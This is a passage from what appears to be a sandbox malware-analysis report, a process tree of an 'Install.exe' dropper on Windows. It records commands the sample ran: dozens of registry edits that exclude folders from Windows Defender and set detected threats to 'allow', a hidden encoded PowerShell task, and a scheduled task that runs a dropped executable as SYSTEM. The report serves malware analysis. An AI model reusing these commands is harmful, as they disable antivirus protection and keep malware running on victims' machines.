Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nXmjFVOHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tuyZfYaPCcjxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\utOkvPMviNUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hVWjTjnIaijqmUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bpNowFaEeWbSfYmu\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:752
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5620
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ANKVsfPAuVEU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4420
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6136
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5676
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5132
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nXmjFVOHU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tuyZfYaPCcjxC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\utOkvPMviNUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hVWjTjnIaijqmUVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pGsjSgOzEAUfMXhcI /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bpNowFaEeWbSfYmu /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4816
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gjCMDuGPa" /SC once /ST 00:03:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gjCMDuGPa"
  2⤵
  PID:4304
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gjCMDuGPa"
  2⤵
  PID:5744
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "fxxmGIjnSbKlnnNZc" /SC once /ST 00:10:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\lUAENHe.exe\" MC /tKtydidvT 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5216
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "fxxmGIjnSbKlnnNZc"
  2⤵
  PID:5380
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1932 -s 556
  2⤵
  - Program crash
  PID:5480

C:\Users\Admin\AppData\Local\Temp\7zSC77C.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC77C.tmp\Install.exe tg /kWldidQkLR 385132 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2180
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:652
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4740
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2332
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2108
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5124
